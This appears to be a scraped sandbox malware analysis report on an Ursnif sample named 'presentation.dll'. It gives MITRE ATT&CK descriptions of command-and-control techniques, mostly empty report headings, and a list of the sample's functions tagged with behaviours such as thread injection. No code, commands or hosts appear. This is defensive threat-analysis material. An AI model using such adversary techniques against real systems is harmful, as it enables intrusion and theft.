Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report presentation.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 6D6417A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Function 6D641E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Function 6D641CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 6D6415A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 6D641D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 6D642485, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195
nativeCOMMON

Function 6D64146C, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Function 6D641566, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Function 6D641F31, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 6D642264, Relevance: .1, Instructions: 77
COMMONCrypto

Function 6D641979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 6D641AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 6D6418D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 6D641B89, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 6D6417A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Function 6D641979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 6D641AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 6D641E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Function 6D641CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON